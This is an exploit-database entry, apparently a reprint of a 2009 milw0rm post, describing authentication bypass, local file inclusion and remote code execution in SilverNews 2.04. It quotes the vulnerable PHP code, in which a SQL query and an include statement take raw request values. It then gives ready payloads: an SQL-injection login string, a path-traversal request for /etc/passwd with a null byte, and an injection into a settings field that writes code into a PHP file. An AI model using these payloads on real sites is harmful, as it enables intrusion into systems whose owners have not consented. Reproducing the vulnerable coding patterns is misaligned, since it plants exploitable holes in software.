SilverNews 2.04 Auth Bypass/LFI/RCE

vendor:

SilverNews

by:

x0r

9.3

CVSS

HIGH

Authentication Bypass, Local File Inclusion, Remote Code Execution

264

CWE

Product Name: SilverNews

Affected Version From: 02.04

Affected Version To: 02.04

Patch Exists: YES

Related CWE: N/A

CPE: a:silver-scripts:silvernews:2.04

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SilverNews 2.04 Auth Bypass/LFI/RCE

SilverNews 2.04 is vulnerable to authentication bypass, local file inclusion and remote code execution. An attacker can bypass the authentication by providing username as ' or '1=1 and password as x0r. An attacker can also perform local file inclusion by providing the path of the file in the section parameter of the admin.php file. An attacker can also perform remote code execution by providing malicious code in the show_cat_prefix parameter of the settings.php file.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : SilverNews 2.04
Download       :
http://www.silver-scripts.de/scripts.php?script=SilverNews&l=en
Vulnerability  : Auth Bypass\LFI\RCE
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
	// Get the user information from the database
	$getinfo = $sql->query("SELECT password, username, id FROM
sn".$sql->prefix."_user WHERE username = '".$_POST['username']."' AND
password = '".$_POST['password']."'");
	$info = $sql->fetch_array($getinfo);
...

	// If "act" isn't set the user will be sent to the homepage.
	if (!$_GET['act'] AND !$_POST['act'] AND !$_GET['section'])
	{
		$_GET['section'] = 'home';
	}

	require "admin/header.php";

	if (file_exists('admin/'.$_GET['section'].".php"))
	{
		require 'admin/'.$_GET['section'].'.php'; #LFI
	}
	else
	{
		$admin->error('Datei konnte nicht gefunden werden!');
	}

	require "admin/footer.php";
[/code]

#########################################################################################


#########################################################################################
[0x03] Exploit:

Exploit: username: ' or '1=1
         password: x0r

LFI: admin.php?section=../../../../../../../../../../etc/passwd%00

RCE:
So we can bypass the admin login and then go to admin/settings.php and put your
evil code ^^ ex: 'show_cat_prefix' => $_POST['show_cat_prefix'], in the sho_cat_prefix we
put: x0r'; echo 'lol   --> /data.inc.php

########################################################################################

# milw0rm.com [2009-02-06]